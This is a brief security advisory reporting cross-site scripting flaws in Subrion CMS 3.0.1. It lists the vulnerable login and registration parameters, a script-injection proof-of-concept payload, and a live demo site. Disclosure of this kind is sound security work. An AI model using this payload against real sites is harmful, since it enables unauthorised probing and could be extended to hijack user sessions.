Subrion CMS version 3.0.1 suffers from a cross site scripting vulnerability.
0ac3ee7611ad37967de005d18613b45aa10427d650f86abe7306afdc16b9b311
Subrion CMS 3.0.1. Multiple Cross Site Scripting Vulnerabilities
Author : syst3m_f4ult
Homepage : http://www.subrion.com/ <http://www.automne-cms.org/>
Vendor : subrion
Version : 3.0.1 (probably all versions)
Tested on : ubuntu 12.04
Date : 2013-10-10
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
Two pages are vulnerable to XSS (Method: POST):
http://localhost/login/ [username parameter]
http://localhost/registration/ [username and email parameters]
Malicious Code:
"><script>alert('syst3m_f4ult')</script>
Demo:
http://cms.subrion.com/login/
http://cms.subrion.com/registration/